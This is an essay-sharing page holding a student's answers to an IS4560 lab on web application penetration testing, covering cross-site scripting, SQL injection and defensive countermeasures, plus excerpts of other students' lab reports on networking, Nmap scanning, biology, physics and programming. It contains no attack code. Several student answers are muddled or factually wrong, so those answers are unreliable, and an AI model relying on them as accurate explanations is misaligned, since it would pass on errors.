Is4560 Lab 5

In: Computers and Technology

Submitted By TermMaster
Words 287
Pages 2
1. It is critical to perform a penetration test on a web application prior to production implementation in order to catch any issues before the application hits the internet and open to malicious attacks.
2. A cross-site scripting attack enables attackers to inject client-side script into web pages viewed by other users.
3. A reflective XSS attack the attack is in the request itself or the URL.
4. The common method of obfuscation used in most real world SQL attacks are methods, including character scrambling and masking, numeric variance and nulling, rely on an array of built-in SQL Server system functions that are used for string manipulation.
5. SQL injections is the most prone to extract privacy data elements out of a database.
6. If I could monitor when SQL injections are performed on an SQL database I would recommend well-coordinated and regularly audited security checks as a security countermeasure to monitor the production SQL database.
7. To identify known software vulnerabilities and exploits on IIS and apache I would create a policy that involves regular audits, penetration tests, and constant monitoring.
8. To ensure that my organization incorporates penetrating testing and web application testing as part of its implementation procedures I would include these in my policy and ensure that all security staff know that these are requirements.
9. Some other security countermeasures that I recommend for web sites and web application deployment to ensure the C-I-A of the web application are:
• Regular security audits
• Penetration testing
• Security awareness training
• ADS/IDS
• Use of a DMZ
• Strict access policies
10. The security team or CIO is responsible and accountable for the CIA of production web applications and web…...

Similar Documents

Lab 5

...Lab #5 Assessment Questions & Answers 1. What is the purpose of the address resolution protocol (ARP)? * ARP converts IP addresses to Ethernet addresses.. 2. What is the purpose of the dynamic host control protocol (DHCP)? * Dynamic Host Configuration Protocol (DHCP) is a method for assigning Internet Protocol (IP) addresses permanently or temporarily to individual computers in an organization's network. 3. What was the DHCP allocated source IP host address for the “Student” VM and Target VM? * 172.30.0.4 - Student VM * 172.30.0.8 – Target VM 4. When you pinged the targeted IP host, what was the source IP address and destination IP address of the ICMP echo-request packet? * Source: 172.30.0.2 * Target: 172.30.0.8 5. Did the targeted IP host respond to the ICMP echo-request packet with an ICMP echo-reply packet? If yes, how many ICMP echo-request packets were sent back to the IP source? * Yes, 8 packets. 6. Find a TCP three-way handshake for a Telnet, FTP, or SSH session. What is the significance of the TCP three-way handshake? * The three-way handshake is needed to establish a reliable connection. The handshake allows the server and client to agree on properties that provide for security as well as reliability. 7. What was the SEQ# of the initial SYN TCP packet and ACK# of the SYN ACK TCP packet? * 8. During the instructor’s Telnet session to LAN Switch 1 and LAN Switch 2, what was the captured......

Words: 342 - Pages: 2

Lab 5

...reflective attack a type of computer security vulnerability it involves the web application dynamically generating a response using non-sanitized data from the client scripts, like Java scripts or VB script, in the data sent to the server will send back a page with the script 4. Based on the tests you performed in this lab, which Web application attack is more likely to extract privacy data elements out of a database? 5. If you can monitor when SQL injections are performed on an SQL database, what would you recommend as a security countermeasure to monitor your production SQL databases? Well coordinated and regularly audited security checks is the best way forward. 6. Given that Apache and Internet Information Services (IIS) are the two most popular web application servers for Linux and Microsoft Windows platforms, what would you do to identify known software vulnerabilities and exploits? 7. What can you do to ensure that your organization incorporates penetration testing and Web application testing as part of its implementation procedures? 8. What is the purpose of setting the DVWA security level to low before beginning the remaining lab steps? 9. As an ethical hacker, once you’ve determined that a database is injectable, what should you do with that inf...

Words: 296 - Pages: 2

Week 5 Lab

...Lab 5 – Weather and Climate Change Lab 5 - Demonstration 1: Modeling the Water Cycle POST LAB QUESTIONS 1. Which water cycle processes are represented in this model and by what components? Answer = Condensation, water and liquid vapor. 2. Which processes are not represented? How could the model be altered to include these processes? Answer = Evaporation and infiltration. By adding soil or sand to the model. 3. How would the “weather” be affected if the water was at a decreased temperature? What about at an increased temperature? Answer = Decreased temperature causes humidity and increase temperature causes cooler temperatures. Experiment 1: Water Movement POST LAB QUESTIONS 1. Develop a hypothesis predicting the effect of sunlight on evaporation? Hypothesis = Sunlight will help water evaporate. 2. Based on the results of your experiment, would you reject or accept the hypothesis that you produced in question 1? Explain how you determined this. Accept/reject = Reject/It appears that the water did not evaporate; it has close to the same of water after three hours. 3. What parts of the water cycle are represented in this experiment? Answer = Infiltration and condensation. 4. How would increasing the proportion of land (sand) to water affect the amount of water vapor released? Answer = More sand......

Words: 270 - Pages: 2

Lab 5

...Lab 5.1 The Condition | True or False | attAverage >= verizonAverage | True | tmobileAverage == 868 | True | verizonAverage < sprintAverage | False | sprintAverage != attAverage | True | Lab 5.2 The Condition | Expected Output | If tmobileAverage > 800 AND verizonAverage> 800 ThenDisplay “Both have average downloadrates over 800”ElseDisplay “One or both of the averagesare less”End If | Both average download Rates over 800 | If sprintAverage == 800 ThenDisplay “Sprints download rate is 800”End If | No display | If attAverage >= 1300 OR tmobileAverage>=900Display “Select either carrier”End If | Select either carrier | Lab 5.3 Main Module() //Declare variables on the next 3 lines Declare Integer testScore = 0 Declare String category = “ “ Declare String interview = “ “ //Make Module calls and pass necessary variables on the next 4 lines Call getScore(testScore) Call employCat(testScore, category) Call interviewPoss(testScore, interview) Call displayInfo(testScore, category, interview) End Main Module getScore(Integer Ref testScore) //Ask user to test score Display “Please enter test score” Input testScore End Module Module employCat(Integer testScore, String ref category) //Determine what employment category they are in based on their test score //Similar to if the score is less than 60, then category is “No” //Otherwise, if score is less than 70, then category is “Maybe” //…and so on if testScore => 85 then Set...

Words: 288 - Pages: 2

Is4560 Lab 1 Assessment

...Lab 1 Assessment Worksheet Develop an Attack & Penetration Plan 1. List the 5 steps of the hacking process. * Reconnaissance * Scanning * Gaining Access * Maintaining Access * Covering Tracks 2. In order to exploit or attack the targeted systems, the first initial step I would do to collect as much information as possible about the targets prior to devising an attack and penetration test plan would be reconnaissance. I would use passive reconnaissance as this pertains to information gathering. 3. The reconnaissance phase can have many different faces, and depending on the goal of the attacker, various tools and applications can be used. Nslookup can be used to look up all the available host on a network through the DNS server. You can get IP address information of hosts on your targeted network. You can also get the information of the purpose of the hosts. Whois lookup is a protocol that can be used to interrogate the servers operated by regional internet registries which holds information about every IP/Domain registered on the internet. You can get information about your target such as; the name of the owner, address of the owner. IP ranges that a certain IP belongs to, contact information like emails and phone numbers, administrators names and server names. You can also just use your targets web site. Sometimes the targets website can reveal way too much information without realizing it, and just by looking at the information they......

Words: 1233 - Pages: 5

Week 5 Lab

...Wireless Spectrum Introduction This lab is going to be very interesting and challenging. We are being introduced to what, for some, is going to be the first time ever using a program that captures and records signals. We must then analyze them and use this as a tool to better be prepared to install and even troubleshoot our networks. My goal for this lab would be to gain a better understanding of this program and be able to recognize how it could be useful for me in my future endeavors. 1. Are any channels being used that overlap other channels? (10 points) It would appear that channels 1, 8 and 11 have the most use going on and that 8 and 11 overlap each other. 2. If you had to install a new wireless LAN, what channel would you use? (10 points) I would use something in the 3-6 range as it would provide the least amount of overlap with other channels. 3. What channels are being used? (10 points) It appears to me that channels 1, 5, and 11 are currently in use. 4. What channel is being used the most? (10 points) Channel 11 appears to have the most use going on on currently. 5. What type of signal is being shown? (10 points) The signal appears to match that of a HyperX RFID Reader. 6. What frequency, not channel, is being used? (5 points) The frequency in use is 2450 mhz. 7. What type of signal is being shown? (10 points) The signal being displayed is 802.11g. 8. How strong in dBms is this signal? (5 points) The signal strength......

Words: 461 - Pages: 2

Lab 5

...it will give you more information that all of the scans. It includes every port UDP and TCP. Plus you can enable different switches like operating system detection. This is an intrusive scan, so I guess if you where enumerating and trying to find out information about the network, you would use this. • Intense Scan – This is like the comprehensive scan. The intense scan is slow but not as slow as comprehensive. You can still run switches like operating system detection and version detection. 4. How many different tests (i.e., scripts) did your "Intense Scan" definition perform? List them all after reviewing the scan report. • It loaded 36 scripts, but I only saw a few performed. APR scan, SYN Stealth Scan, Service Scan, OS detection 5. Describe what each of these tests or scripts performs within the Zenmap GUI (Nmap) scan report. • ARP Ping Scan scanned to look for the machine • SYN Stealth Scan - Scans to see if the ports are open by sending a SYN packet if a packet is sent back, the port is open. If the port is closed, you would receive a different response. • Service Scan – Scans what services are available. • Detects operating system details 6. How many total IP hosts (not counting Cisco device interfaces) did Zenmap GUI (Nmap) find on the network? • It found 256 IP Addreses. 7. Based on your Nmap scan results and initial reconnaissance and probing, what next steps would you perform on the VSCL target machines?...

Words: 424 - Pages: 2

It255P Lab 5 Assessment

...JOHN A. BROOKS LAB ASSESSMENT LAB 5 LAB Assessment Questions & Answers 1. What is the purpose of the address resolution protocol (ARP)? (A).ARP converts IP addresses to Ethernet addresses. 2. What is the purpose of the dynamic host control protocol (DHCP)? (A) Dynamic Host Configuration Protocol (DHCP) is a method for assigning Internet Protocol (IP) addresses permanently or temporarily to individual computers in an organization's network. 3. What was the DHCP allocated source IP host address for the “Student” VM and Target VM? (A)172.30.0.4 - Student VM; 172.30.0.8 – Target VM 4. When you pinged the targeted IP host, what was the source IP address and destination IP address of the ICMP echo-request packet? Source: 172.30.0.2 (A)Target: 172.30.0.8 5. Did the targeted IP host respond to the ICMP echo-request packet with an ICMP echo-reply packet? If yes, how many ICMP echo-request packets were sent back to the IP source? (A) Yes, 8 packets. 6. Find a TCP three-way handshake for a Telnet, FTP, or SSH session. What is the significance of the TCP three-way handshake? (A)The three-way handshake is needed to establish a reliable connection. The handshake allows the server and client to agree on properties that provide for security as well as reliability. 7. What was the SEQ# of the initial SYN TCP packet and ACK# of the SYN ACK TCP packet? 8. During the instructor’s Telnet session to LAN Switch 1 and LAN Switch 2, what was the captured terminal......

Words: 359 - Pages: 2

Bio156 Lab 5

...oxygen. What is the primary energy molecule in cells? (5 points) ATP is the main energy molecule in cells and has a unique function as an energy transferor. This molecule contains nitrogenous base adenine connected to three molecules of phosphorus. The last 2 phosphates are high energy bonds. When ATP releases the terminal phosphate, energy is released while forming a new compound ADP. ADP can be remade with another phosphate to form ATP again List the equation in word and chemical form for each of the following processes: (6 points) Cellular respiration: C6H12O6  +  6O2 →  6CO2  +  6 H2O  +  36 or 38 ATP Alcoholic fermentation: C6H12O6  →  2CO2  +  2C2H5OH  +  2 ATP Lactic acid fermentation: Plant and fungal cells produce alcohol as a result of fermentation and animal cells produce lactic acid Does glycolysis require the presence of oxygen? Please explain your answer. (5 points) No, glycolysis does not require the presence of oxygen. It occurs in the cytoplasm of all cells. a single glucose molecule in glycolysis produces a total of 2 molecules of pyruvic acid, 2 molecules of ATP, 2 molecules of NADH and 2 molecules of water.  More ATP molecules are generated in step 7 and 2 more in step 10. This gives a total of 4 ATP molecules produced total with a final total of 2 ATP molecules remaining. Review the results from the Rate of Cellular Respiration and Exercise procedure of the lab (Part I) to answer the following questions. Why was......

Words: 964 - Pages: 4

Lab 5

...must be overcome depends on the normal force as and the normal force is given by . When the surface becomes an inclined plane, the normal force changes and when the normal force changes, so does the friction. In this lab, you will change the angle of an inclined plane and observe how weight is resolved into its components (Fn and F//) using the basic trig functions. Procedure: Play with the Sims  Motion  The Ramp • Be sure to stay in the part of the simulation. More features will be used later when we investigate energy. Start by playing with the cabinet some. • Move the cabinet up and down the ramp by dragging it with your mouse. • Move the ramp to an angle of zero (horizontal) and draw a free body diagram of the cabinet here: 1. On a horizontal plane, the normal force is Perpendicular to the weight. 2. The cabinet has a mass of 100kg. It therefore has a normal force of -100 N and a friction force (on the horizontal plane) of ___2.22___ μ = 0.30 • the ramp and draw a free body diagram of the cabinet in the box here: 3. The force down the plane and normal force are components of Force Diagrams. 4. Before we add an applied force on the ramp, there is a force of Gravity that acts against the force down the plane( Force parallel). 5. When we apply a force to get the cabinet moving, the friction force acts in the Opposite direction as movement of the cabinet. 6. Slowly increase angle (0.1 degrees at a time) of the ramp until the cabinet starts to......

Words: 666 - Pages: 3

Cds344 Lab #5

...Lab #5 – Assessment Worksheet Performing Packet Capture and Traffic Analysis CDS344 - Information Security Course Name and Number: _____________________________________________________ Christian Tiell Student Name: ________________________________________________________________ Scott Blough Instructor Name: ______________________________________________________________ Lab Due Date: ________________________________________________________________ Overview In this lab, you used common applications to generate traffic and transfer files between the machines in this lab. You captured data using Wireshark and reviewed the captured traffic at the packet level, and then you used NetWitness Investigator, a free tool that provides security practitioners with a means of analyzing a complete packet capture, to review the same traffic at a consolidated level. Lab Assessment Questions & Answers 1. Why would a network administrator use Wireshark and NetWitness Investigator together? Wireshark - it is better at performing analysis NetWitness - it is better at performing captures 2. What was the IP address for LanSwitch1? 172.16.8.5 3. When the 172.16.8.5 IP host responded to the ICMP echo-requests, how many ICMP echo-reply packets were sent back to the vWorkstation? 23 4. What was the terminal password for LanSwitch 1 and LanSwitch 2? Cisco 5. When using SSH to remotely access a Cisco router, can you see the terminal password? Why or why not? No, one could not view......

Words: 294 - Pages: 2

Bilogy Lab 5

...Student Sheet Name: Date: Instructor’s Name: Assignment: SCIE207 Phase 5 Lab Report Title: Taxonomy Lab to Show Organism Relationships Instructions: You will need to fill out the data table and answer a set of questions. When your lab report is complete, submit this document to your instructor in your assignment box. Part 1: Using the lab animation, fill in the following data tables to help you answer the questions that follow: Table 1: Samples 1–5 |Phylum/Class |Sample 1: Chrysophyta |Sample 2: Annelida |Sample 3: Arthropoda |Sample 4: Amphibia |Sample 5: Aves | |Common Feature | | | | | | |Nutrition | | | | | | |How does the organism break down and absorb food? | | | | | | |Circulatory System (Transport) | | ...

Words: 457 - Pages: 2

Lab 5

...Name: Date: Instructor’s Name: Assignment: SCI103 Phase 1 Lab Report Title: Measuring pH Levels Instructions: Enter the Virtual Lab, and conduct the experiments provided before going out into the virtual field for additional research. Please type your answers on this form. When your lab report is complete, submit it to the Submitted Assignments area of the Virtual Classroom. Part I: Answer the following questions while in the Phase 1 lab environment. Section 1: You will be testing 4 known solutions for pH levels using a standard wide-range indicator. Based off of the results obtained in the lab room, fill in the following table: |Solution Number |pH from Lab |Acid, Base or Neutral? |Solution Name (what was in the test tube?) | |Solution 1 |6 |Acid |Pure Water | |Solution 2 |1 |Acid |Lemon Juice | |Solution 3 |12 |Base |Bleach | |Solution 4 |5 |Acid |Coffee | 1. How many drops of wide range indicator will you use for each test, based on industry standards......

Words: 696 - Pages: 3

Prelab Assignment Lab 5

...ITCS 1212L PreLab 5 Rational and equality operators, logical operators, conditional operators, conditional structures, selective structures, typecasting, and working with debuggers. Learning Objectives: ● Practice more with if-else-if and switch statements. ● Understand the concept of scope ● Understand the difference between static, local and global variables ● Practice with functions that can return more than a value and whose parameters’ scopes are not local to the function ● Input validation These pre-labs are directly related to the lab activities. You don’t need to complete the program. What you need to do is to work on the logic and perhaps some key parts of each program and then complete them in the lab. Assigned: Date of your lab 4 Due: the night before lab 5 Questions Prelab activity for Lab 5A: Find the difference between two types of returning values. Implement the following function prototypes (which take hours of work as integer and the rate of pay as float and calculates the net-payment as float) on paper. Also, write a main function which calls both functions. Compare the calculated net values and show the proper message whether or not they match. Name your variables as hours, rate, and netPay. float calNetPay(int, float); void calNetPay2(float&, int, float); Also, answer the following questions: What does the operator & do? Create a table and put all of the variables of the program inside the first column. The second......

Words: 471 - Pages: 2

Lab 5

... c.s. * Prepared slide of mature lily anther (pollen grains), c.s. * Mature pollen * Glass slide * Coverslip * Compound microscope * 0.5% sucrose, in dropping bottle * Prepared slide of lily ovary, c.s megaspore mother cell * Compound microscope * Bean fruits * Soaked bean seeds * Iodine solution(I2KI), in a dropping bottle * Herbarium mount of Capsella, with fruits Procedure: Refer to Biology lab manual, lab 5- pages 3-7. Results: Questions: 1. Gymnosperms | Angiosperms | | | a.cones | flowers | c.Bare, not enclosed; found on scales, leaves or as cones. | Enclosed inside an ovary, usually in a fruit. | b. seed | Endosperm | 2. Pollination is the act of transferring pollen from the male part of a flower to the female part of a flower. Fertilization occurs when the male gamete of any sexually reproducing organism combines with a female gamete to form a zygote. 3. A. receptacle B. c.ovary D. filament E. stigma 4. It is a monocotyledon. 5. A. anther pollen tetrad B. pollen sacs...

Words: 362 - Pages: 2

UPComing Toy Story 4 (2019) | Xiaomi (15) | Amazon Renewed Refurbished products with a warranty